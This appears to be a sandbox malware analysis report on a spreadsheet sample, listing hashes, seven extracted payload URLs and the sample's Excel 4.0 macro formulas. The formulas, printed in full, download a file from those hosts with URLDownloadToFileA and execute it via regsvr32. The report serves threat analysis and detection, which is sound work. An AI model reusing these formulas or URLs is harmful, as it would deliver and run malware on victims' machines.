General
-
Target
c98b83d52cc2781dccd7046c3ad97cb33d19c4e57c93d079904617cbee7bb12d
-
Size
33KB
-
MD5
1326b9a0d06ef46cc3b23d55210f9f14
-
SHA1
98f2357a75bcc0b9e186f368b374236802fa0e3c
-
SHA256
c98b83d52cc2781dccd7046c3ad97cb33d19c4e57c93d079904617cbee7bb12d
-
SHA512
ea1eb699050ba063835573f489790c758c09ce1f88396fc036a517230038db957d32ebc2b8e6e81247d64b0bfda4c12cb9abba491b1ba82036b15b436b7f7385
-
SSDEEP
768:sCV32VKE5vp96wU1+FCh+JJwthSy8G/B4xhLBC:5V3ST6Z4FLLwtL4BC
Malware Config
Extracted
https://al-brik.com/vb/pjD6kXT79JBgdqhtgBU/
https://alicehui.com/pics/yjGo0PrY/
https://albassiria.ma/EhT0YlEAF7/XsmBCt/
https://vika.pl/backup/Q4bAjod4QKE6epp/
https://andiso.dk/limny/2ZTmq/
https://www.impactad.co.kr/images/EDltKgE5p/
https://babylee.cl/site/sTBIv21f/
-
formulas
=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://al-brik.com/vb/pjD6kXT79JBgdqhtgBU/","..\wnru.ocx",0,0) =IF('HUNJK'!E15<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://alicehui.com/pics/yjGo0PrY/","..\wnru.ocx",0,0)) =IF('HUNJK'!E17<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://albassiria.ma/EhT0YlEAF7/XsmBCt/","..\wnru.ocx",0,0)) =IF('HUNJK'!E19<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://vika.pl/backup/Q4bAjod4QKE6epp/","..\wnru.ocx",0,0)) =IF('HUNJK'!E21<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://andiso.dk/limny/2ZTmq/","..\wnru.ocx",0,0)) =IF('HUNJK'!E23<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://www.impactad.co.kr/images/EDltKgE5p/","..\wnru.ocx",0,0)) =IF('HUNJK'!E25<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://babylee.cl/site/sTBIv21f/","..\wnru.ocx",0,0)) =IF('HUNJK'!E27<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\wnru.ocx") =RETURN()
Signatures
Files
-
c98b83d52cc2781dccd7046c3ad97cb33d19c4e57c93d079904617cbee7bb12d